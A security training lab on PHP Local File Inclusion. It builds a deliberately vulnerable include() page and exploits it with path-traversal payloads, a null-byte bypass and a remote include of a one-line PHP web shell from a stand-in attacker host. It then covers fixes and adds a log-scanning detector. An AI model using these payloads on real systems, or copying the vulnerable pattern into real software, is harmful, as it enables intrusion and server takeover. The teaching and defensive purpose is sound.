
Exercise 7: File Inclusion Vulnerability (LFI)

Jan 16, 2025

Objective

Learn how to exploit Local File Inclusion (LFI) vulnerabilities to read sensitive files on the server and understand how attackers can escalate this to Remote File Inclusion (RFI) or code execution.

Scenario

You are evaluating the security of a web application that lets users load different pages through a URL parameter. Because the parameter is not validated, the application is vulnerable to Local File Inclusion (LFI), which lets an attacker read sensitive files on the server.

Lab Setup

Prerequisites:

  • Basic knowledge of PHP and Linux file systems.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

PHP Script with File Inclusion

Create a file index.php:

<?php
// Deliberately vulnerable: the page parameter is passed straight to include()
// with no validation, so any path (or, with allow_url_include=On, any URL) is loaded.
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);
} else {
    echo "<h2>Welcome to the Vulnerable Website</h2>";
}
?>

Additional Files for Inclusion

Create two files for testing legitimate file inclusion:

about.php:

<h2>About Us</h2>
<p>This is the about page.</p>

contact.php:

<h2>Contact Us</h2>
<p>Email us at contact@example.com.</p>

Running the Application

Start the Apache server.

Place all files in the web server’s root directory (htdocs for XAMPP).

Open http://localhost/index.php?page=about.php to see the About page.

Exploitation Steps

Step 1: Testing for LFI Vulnerability

Open the browser and navigate to:

http://localhost/index.php?page=../../../../etc/passwd

(On Windows, try: ../../../../windows/system32/drivers/etc/hosts)

Expected Result:

  • The content of the /etc/passwd file is displayed, exposing sensitive system information.

Step 2: Using Null Byte Injection (if needed)

Some applications append a fixed suffix such as .php to the input. On PHP versions before 5.3.4 a null byte (%00) truncated the path and so bypassed the suffix; current PHP versions reject include paths that contain a null byte, so this step only applies to legacy targets:

http://localhost/index.php?page=../../../../etc/passwd%00

Step 3: Escalation to Remote File Inclusion (RFI)

If remote file inclusion is allowed (allow_url_include=On, which in turn requires allow_url_fopen=On), the same parameter can load remote files:

http://localhost/index.php?page=http://attacker.com/shell.txt

Example content of shell.txt:

<?php system($_GET['cmd']); ?>

This allows remote code execution by navigating to:

http://localhost/index.php?page=http://attacker.com/shell.txt&cmd=whoami

Solution and Prevention

Problem Analysis

  • The application includes files based on unvalidated user input, exposing server files.

Fixing the Vulnerability

Whitelist Allowed Pages

Restrict file inclusion to predefined pages:

<?php
// Only names that appear in this fixed list are ever passed to include();
// the third argument makes in_array() use strict (===) comparison.
$whitelist = ['about.php', 'contact.php'];
if (isset($_GET['page']) && in_array($_GET['page'], $whitelist, true)) {
    include($_GET['page']);
} else {
    echo "<h2>Page not found.</h2>";
}
?>

Use Static File Paths

Avoid building include paths from user input. If a file name must come from the request, strip any directory component with basename() so traversal sequences (and the host part of a URL) are discarded and only files inside the pages/ directory can be reached:

<?php
// basename() keeps only the final path component, so "../../../../etc/passwd"
// becomes "passwd" and the include cannot leave the pages/ directory.
$page = basename($_GET['page'] ?? '');
if ($page !== '' && is_file("pages/" . $page)) {
    include("pages/" . $page);
}
?>

Disable URL File Inclusion

Edit php.ini to prevent remote file inclusion:

allow_url_include = Off
allow_url_fopen = Off

Implement Input Validation

Sanitize and validate input to prevent directory traversal:

<?php
// Remove every character outside [A-Za-z0-9_.]: slashes, backslashes and "://"
// are stripped, so "../../../../etc/passwd" collapses to a harmless run of dots followed by "etcpasswd".
$page = preg_replace('/[^a-zA-Z0-9_.]/', '', $_GET['page'] ?? '');
if ($page !== '') {
    include("pages/" . $page);
}
?>

Testing After Fix

Retry accessing sensitive files with:

http://localhost/index.php?page=../../../../etc/passwd

Observe that the application blocks unauthorized file access.
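The same payloads used in the exploitation steps can also be spotted in the web server logs. The following Python script is an added example, not part of the original lab: it scans Apache access-log lines for the index.php page parameter and flags traversal sequences, null bytes and remote URLs. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines: one legitimate request followed by the
# lab's traversal, null-byte, remote-include and Windows-traversal payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2025:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512
10.0.0.9 - - [16/Jan/2025:10:00:07 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [16/Jan/2025:10:00:12 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 2048
10.0.0.9 - - [16/Jan/2025:10:00:20 +0000] "GET /index.php?page=http://attacker.com/shell.txt&cmd=whoami HTTP/1.1" 200 64
10.0.0.9 - - [16/Jan/2025:10:00:25 +0000] "GET /index.php?page=../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 800
"""

# Extracts the request target from the quoted request line of a log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_page_param(value):
    """Return the file-inclusion indicators found in one decoded page value."""
    findings = []
    if "\x00" in value:
        findings.append("null-byte")
    # A ".." path segment, with either slash style, at any position.
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", value):
        findings.append("path-traversal")
    # A URL scheme at the start of the value (http://, ftp://, ...).
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):
        findings.append("remote-include")
    return findings


def scan_access_log(log_text, param="page"):
    """Return one alert dict per log line whose page parameter looks malicious."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes once; a second unquote catches double encoding.
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            value = unquote(raw)
            findings = classify_page_param(value)
            if findings:
                alerts.append({"line": line, "value": value, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(", ".join(alert["findings"]), "<-", alert["value"])
```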

Conclusion

In this lab, you exploited a Local File Inclusion (LFI) vulnerability to access sensitive server files and demonstrated how it could escalate to Remote File Inclusion (RFI) for code execution. You also learned mitigation strategies like input validation, file whitelisting, and disabling URL inclusion to secure applications against file inclusion attacks.
